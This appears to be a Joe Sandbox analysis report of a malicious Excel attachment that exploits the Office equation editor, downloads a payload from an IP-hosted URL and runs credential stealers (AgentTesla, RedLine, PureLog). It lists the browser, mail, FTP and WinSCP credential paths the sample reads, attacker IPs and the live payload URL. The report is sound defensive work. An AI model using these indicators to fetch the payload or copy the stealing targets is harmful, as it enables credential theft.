                  Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.CKK.exe.140000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.608358959.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.447488825.0000000000140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\SessionsJump to behavior
                  Tries to harvest and steal browser information (history, passwords, etc)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.iniJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\FTP Navigator\Ftplist.txtJump to behavior
                  Tries to steal Mail credentials (via file / registry access)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.iniJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: CKK.exeBinary or memory string: WIN_81
                  Source: CKK.exeBinary or memory string: WIN_XP
                  Source: CKK.exe.2.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
                  Source: CKK.exeBinary or memory string: WIN_XPe
                  Source: CKK.exeBinary or memory string: WIN_VISTA
                  Source: CKK.exeBinary or memory string: WIN_7
                  Source: CKK.exeBinary or memory string: WIN_8
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.450ee8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.450000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.450000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.a6ff36.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.a6f04e.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.3446458.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4c0000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.3497170.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.a6f04e.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.450ee8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.3497170.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.3446458.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.a6ff36.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.608574126.0000000003441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.608436273.0000000000A2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.608494898.0000000002493000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1128, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected AgentTesla
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.450ee8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.450000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.450000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.a6ff36.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.a6f04e.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.3446458.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4c0000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.3497170.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.a6f04e.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.450ee8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.3497170.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.3446458.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.a6ff36.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.608574126.0000000003441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.608436273.0000000000A2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 1128, type: MEMORYSTR
                  Yara detected PureLog Stealer
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.450ee8.2.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.450000.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.450000.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.a6ff36.4.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.a6f04e.5.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.3446458.6.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4c0000.3.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.3497170.7.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.a6f04e.5.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.450ee8.2.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.4c0000.3.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.3497170.7.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.3446458.6.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.a6ff36.4.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.608574126.0000000003441000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000004.00000002.608436273.0000000000A2F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Yara detected RedLine Stealer
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 4.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 3.2.CKK.exe.140000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 00000004.00000002.608358959.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000003.00000002.447488825.0000000000140000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EC1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,3_2_00EC1204
                  Source: C:\Users\user\AppData\Roaming\CKK.exeCode function: 3_2_00EC1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,3_2_00EC1806

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information1
                  Scripting                  		2
                  Valid Accounts                  		121
                  Windows Management Instrumentation                  		1
                  Scripting                  		1
                  Exploitation for Privilege Escalation                  		11
                  Disable or Modify Tools                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		12
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts2
                  Native API                  		1
                  DLL Side-Loading                  		1
                  DLL Side-Loading                  		11
                  Deobfuscate/Decode Files or Information                  		121
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol2
                  Data from Local System                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts33
                  Exploitation for Client Execution                  		2
                  Valid Accounts                  		2
                  Valid Accounts                  		2
                  Obfuscated Files or Information                  		1
                  Credentials in Registry                  		2
                  File and Directory Discovery                  		SMB/Windows Admin Shares1
                  Email Collection                  		2
                  Non-Application Layer Protocol                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook21
                  Access Token Manipulation                  		1
                  Software Packing                  		NTDS38
                  System Information Discovery                  		Distributed Component Object Model121
                  Input Capture                  		23
                  Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script212
                  Process Injection                  		1
                  DLL Side-Loading                  		LSA Secrets25
                  Security Software Discovery                  		SSH3
                  Clipboard Data                  		Fallback ChannelsScheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                  Masquerading                  		Cached Domain Credentials12
                  Virtualization/Sandbox Evasion                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                  Valid Accounts                  		DCSync2
                  Process Discovery                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                  Virtualization/Sandbox Evasion                  		Proc Filesystem1
                  Application Window Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt21
                  Access Token Manipulation                  		/etc/passwd and /etc/shadow1
                  System Owner/User Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron212
                  Process Injection                  		Network Sniffing1
                  Remote System Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                  System Network Configuration Discovery                  		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 signatures2 2 Behavior Graph ID: 1435421 Sample: PO 2_5_24.xlam.xlsx Startdate: 02/05/2024 Architecture: WINDOWS Score: 100 28 Multi AV Scanner detection for domain / URL 2->28 30 Found malware configuration 2->30 32 Malicious sample detected (through community Yara rule) 2->32 34 17 other signatures 2->34 8 EXCEL.EXE 6 11 2->8         started        process3 process4 10 EQNEDT32.EXE 1 8->10         started        dnsIp5 26 23.94.54.101, 49161, 80 AS-COLOCROSSINGUS United States 10->26 22 C:\Users\user\AppData\Roaming\CKK.exe, PE32 10->22 dropped 44 Office equation editor establishes network connection 10->44 46 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 10->46 15 CKK.exe 4 10->15         started        file6 signatures7 process8 signatures9 48 Multi AV Scanner detection for dropped file 15->48 50 Binary is likely a compiled AutoIt script file 15->50 52 Machine Learning detection for dropped file 15->52 54 2 other signatures 15->54 18 RegSvcs.exe 12 2 15->18         started        process10 dnsIp11 24 api.ipify.org 104.26.12.205, 443, 49162 CLOUDFLARENETUS United States 18->24 36 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 18->36 38 Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines) 18->38 40 Tries to steal Mail credentials (via file / registry access) 18->40 42 2 other signatures 18->42 signatures12

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  PO 2_5_24.xlam.xlsx53%VirustotalBrowse
                  PO 2_5_24.xlam.xlsx63%ReversingLabsDocument-Office.Exploit.CVE-2017-11882
                  PO 2_5_24.xlam.xlsx100%AviraEXP/CVE-2017-11882.Gen

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Roaming\CKK.exe100%Joe Sandbox ML
                  C:\Users\user\AppData\Roaming\CKK.exe39%ReversingLabs
                  C:\Users\user\AppData\Roaming\CKK.exe40%VirustotalBrowse

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
                  http://ocsp.entrust.net030%URL Reputationsafe
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
                  http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                  http://ocsp.entrust.net0D0%URL Reputationsafe
                  http://23.94.54.101/ISW.exe0%Avira URL Cloudsafe
                  https://api.ipif8z0%Avira URL Cloudsafe
                  http://23.94.54.101/ISW.exe7%VirustotalBrowse

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  api.ipify.org
                  		104.26.12.205
                  		truefalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    https://api.ipify.org/false
                      		high
                      http://23.94.54.101/ISW.exetrue
                      • 7%, Virustotal, Browse
                      • Avira URL Cloud: safe
                      		unknown

                      URLs from Memory and Binaries

                      NameSourceMaliciousAntivirus DetectionReputation
                      https://api.ipify.orgRegSvcs.exe, 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608494898.0000000002441000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608494898.0000000002538000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608574126.0000000003441000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608494898.00000000024FC000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608436273.0000000000A2F000.00000004.00000020.00020000.00000000.sdmpfalse
                        		high
                        http://crl.pkioverheid.nl/DomOvLatestCRL.crl0RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://account.dyn.com/RegSvcs.exe, 00000004.00000002.608372790.0000000000450000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608390113.00000000004C0000.00000004.08000000.00040000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608574126.0000000003441000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608436273.0000000000A2F000.00000004.00000020.00020000.00000000.sdmpfalse
                          		high
                          http://crl.entrust.net/server1.crl0RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmpfalse
                            		high
                            http://ocsp.entrust.net03RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://api.ipif8zRegSvcs.exe, 00000004.00000002.608494898.0000000002538000.00000004.00000800.00020000.00000000.sdmpfalse
                            • Avira URL Cloud: safe
                            		unknown
                            http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            http://www.diginotar.nl/cps/pkioverheid0RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            		unknown
                            https://api.ipify.org/TRegSvcs.exe, 00000004.00000002.608494898.0000000002538000.00000004.00000800.00020000.00000000.sdmpfalse
                              		high
                              https://api.ipify.org/tRegSvcs.exe, 00000004.00000002.608494898.0000000002441000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608494898.0000000002538000.00000004.00000800.00020000.00000000.sdmpfalse
                                		high
                                http://ocsp.entrust.net0DRegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                • URL Reputation: safe
                                		unknown
                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameRegSvcs.exe, 00000004.00000002.608494898.0000000002441000.00000004.00000800.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608494898.0000000002538000.00000004.00000800.00020000.00000000.sdmpfalse
                                  		high
                                  https://secure.comodo.com/CPS0RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 00000004.00000002.608641256.00000000056E1000.00000004.00000020.00020000.00000000.sdmpfalse
                                    		high
                                    http://crl.entrust.net/2048ca.crl0RegSvcs.exe, 00000004.00000002.608641256.00000000056F4000.00000004.00000020.00020000.00000000.sdmpfalse
                                      		high
                                      http://api.ipify.orgRegSvcs.exe, 00000004.00000002.608494898.0000000002556000.00000004.00000800.00020000.00000000.sdmpfalse
                                        		high

                                        World Map of Contacted IPs

                                        • No. of IPs < 25%
                                        • 25% < No. of IPs < 50%
                                        • 50% < No. of IPs < 75%
                                        • 75% < No. of IPs

                                        Public IPs

                                        IPDomainCountryFlagASNASN NameMalicious
                                        104.26.12.205
                                        		api.ipify.orgUnited States
                                        		13335CLOUDFLARENETUSfalse
                                        23.94.54.101
                                        		unknownUnited States
                                        		36352AS-COLOCROSSINGUStrue

                                        General Information

                                        Joe Sandbox version:40.0.0 Tourmaline
                                        Analysis ID:1435421
                                        Start date and time:2024-05-02 17:38:11 +02:00
                                        Joe Sandbox product:CloudBasic
                                        Overall analysis duration:0h 7m 22s
                                        Hypervisor based Inspection enabled:false
                                        Report type:full
                                        Cookbook file name:defaultwindowsofficecookbook.jbs
                                        Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                                        Number of analysed new started processes analysed:7
                                        Number of new started drivers analysed:0
                                        Number of existing processes analysed:0
                                        Number of existing drivers analysed:0
                                        Number of injected processes analysed:0
                                        Technologies:
                                        • HCA enabled
                                        • EGA enabled
                                        • AMSI enabled
                                        Analysis Mode:default
                                        Analysis stop reason:Timeout
                                        Sample name:PO 2_5_24.xlam.xlsx
                                        Detection:MAL
                                        Classification:mal100.troj.spyw.expl.evad.winXLSX@6/8@2/2
                                        EGA Information:
                                        • Successful, ratio: 100%
                                        HCA Information:
                                        • Successful, ratio: 94%
                                        • Number of executed functions: 109
                                        • Number of non-executed functions: 255
                                        Cookbook Comments:
                                        • Found application associated with file extension: .xlsx
                                        • Found Word or Excel or PowerPoint or XPS Viewer
                                        • Attach to Office via COM
                                        • Active ActiveX Object
                                        • Scroll down
                                        • Close Viewer

                                        Warnings

                                        • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe
                                        • HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                        • Report size exceeded maximum capacity and may have missing disassembly code.
                                        • Report size getting too big, too many NtOpenKeyEx calls found.
                                        • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                        • Report size getting too big, too many NtQueryValueKey calls found.

                                        Simulations

                                        Behavior and APIs

                                        TimeTypeDescription
                                        17:39:44API Interceptor17x Sleep call for process: EQNEDT32.EXE modified
                                        17:39:47API Interceptor20x Sleep call for process: RegSvcs.exe modified

                                        Joe Sandbox View / Context

                                        IPs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        104.26.12.205Sonic-Glyder.exeGet hashmaliciousStealitBrowse
                                        • api.ipify.org/?format=json
                                        Sky-Beta.exeGet hashmaliciousStealitBrowse
                                        • api.ipify.org/?format=json
                                        SecuriteInfo.com.Backdoor.Win32.Agent.myuuxz.13708.17224.exeGet hashmaliciousBunny LoaderBrowse
                                        • api.ipify.org/
                                        lods.cmdGet hashmaliciousRemcosBrowse
                                        • api.ipify.org/
                                        23.94.54.101Order Request1_5_24.xlam.xlsxGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                        • 23.94.54.101/IZG.exe
                                        202404294766578200.xlam.xlsxGet hashmaliciousRemcosBrowse
                                        • 23.94.54.101/GVV.exe
                                        attachment.xlam.xlsxGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                        • 23.94.54.101/EPQ.exe
                                        NI-45733-D.xlam.xlsxGet hashmaliciousAgentTesla, PureLog Stealer, RedLineBrowse
                                        • 23.94.54.101/ESS.exe

                                        Domains

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        api.ipify.orgSC-246214.docGet hashmaliciousAgentTeslaBrowse
                                        • 172.67.74.152
                                        NOA.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 172.67.74.152
                                        Approved E-DO PDF.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 104.26.13.205
                                        Order No Q240419617006.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 104.26.12.205
                                        Purchase Order05022024.exeGet hashmaliciousAgentTesla, GuLoaderBrowse
                                        • 172.67.74.152
                                        irlsheis.docGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 172.67.74.152
                                        noa.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 172.67.74.152
                                        GX_MV Sunshine 07483032r_pdf.exeGet hashmaliciousAgentTeslaBrowse
                                        • 104.26.12.205
                                        product.exeGet hashmaliciousAgentTeslaBrowse
                                        • 104.26.12.205
                                        cXPFfk0pBp7bEsb.pif.exeGet hashmaliciousAgentTesla, PureLog StealerBrowse
                                        • 104.26.12.205

                                        ASNs

                                        MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                        CLOUDFLARENETUSSC-246214.docGet hashmaliciousAgentTeslaBrowse
                                        • 172.67.74.152
                                        INQUIRY#46789.xla.xlsxGet hashmaliciousRemcosBrowse
                                        • 172.67.206.230
                                        file.exeGet hashmaliciousLummaCBrowse
                                        • 104.21.95.19
